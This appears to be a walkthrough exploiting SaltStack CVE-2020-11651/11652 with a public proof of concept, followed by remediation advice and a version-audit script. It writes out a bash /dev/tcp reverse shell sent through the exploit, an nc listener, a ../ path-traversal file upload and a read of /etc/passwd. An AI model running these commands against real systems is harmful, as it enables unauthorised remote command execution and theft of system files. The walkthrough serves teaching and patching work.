The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.

Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.


An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.


An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

Affected Products

  • SaltStack Salt 2019.2.3
  • SaltStack Salt 3000.1
  • Cisco Modeling Labs Corporate Edition (CML)
  • Cisco TelePresence IX5000 Series
  • Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)


1. This vulnerability is present before the version 3000.1. We will enumerate this service; first, I noticed an API site exposed.


2. In order to examine the version, I ran a curl command and sent an HTTP request to check the response headers. I noticed “X-Upstream: salt-api/3000-1”.

  • curl -v


1. Knowing this API is SaltStack, we can proceed to look for exploits. I found this one that worked really well.

2. We will proceed to download the exploit and install the required libraries (salt).

  • git clone
  • sudo pip3 install salt
  • cd CVE-2020-11651-poc
  • ls

3. Now we proceed to execute the file; we will run the help option.

  • python3 -h

4. Now we will execute the program as a test. If we get the “root key”, it means it is working without issues.

  • python3 --master

5. Now I will run a test command: I’ll run a ping command and capture it with tcpdump (this will only execute on the master; if you need to execute on all the minion servers, use --exec-all).

Packet Capture

  • sudo tcpdump -i tun0

Command execution

  • python3 --master --exec "ping -c 4"

Output in packet capture

6. At this point we know that we can execute commands and that we have connectivity back to our local machine. Now I will start a listener and execute a bash reverse shell.


  • nc -lvp 4505

Reverse Shell

  • python3 --master --exec "bash -i >& /dev/tcp/ 0>&1"

Final result, (reverse shell)

  • whoami && date && hostname


1. We can upload files and read them back to verify.

  • echo "Vry4n was here" > sample.txt
  • python3 --master --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
  • python3 --master -r "/tmp/sample.txt"

2. We can also read files using (-r)

  • python3 --master -r "/etc/passwd"


Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SaltStack website.
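
To find which masters still need that upgrade, the affected ranges quoted above ("before 2019.2.4" and "3000 before 3000.2") can be checked across an inventory. The following is an added example, not code from the original post or from SaltStack; the function names, hostnames and sample inventory are constructed, and the banner form `salt-api/3000-1` is taken from the response header shown earlier.

```python
import re

# Fixed releases named in the advisory text above.
FIXED_2019 = (2019, 2, 4)
FIXED_3000 = (3000, 2)

def parse_salt_version(text):
    """Turn '3000.1', 'salt 2019.2.3' or a banner like 'salt-api/3000-1' into a tuple."""
    m = re.search(r"(\d+(?:[.-]\d+)*)", text.split("/")[-1])
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(p) for p in re.split(r"[.-]", m.group(1)))

def is_affected(version):
    """True for 'before 2019.2.4' or '3000 before 3000.2'.

    The two release lines are compared separately: a patched 2019.2.x
    release is numerically lower than 3000.2 but is not vulnerable.
    """
    if version[0] >= 3000:
        return version[:1] == (3000,) and version < FIXED_3000
    return version < FIXED_2019

def audit(inventory):
    """Return {host: raw_version} for hosts that need the upgrade or a manual look."""
    flagged = {}
    for host, raw in inventory.items():
        try:
            if is_affected(parse_salt_version(raw)):
                flagged[host] = raw
        except ValueError:
            flagged[host] = raw  # unparseable version: flag for manual review
    return flagged

# Constructed inventory: hostnames are made up for this example.
SAMPLE = {
    "master-a": "salt-api/3000-1",
    "master-b": "2019.2.3",
    "master-c": "2019.2.4",
    "master-d": "3000.2",
    "master-e": "3001",
    "master-f": "unknown",
}

if __name__ == "__main__":
    for host, raw in audit(SAMPLE).items():
        print(f"{host}: {raw} -> upgrade or review")
```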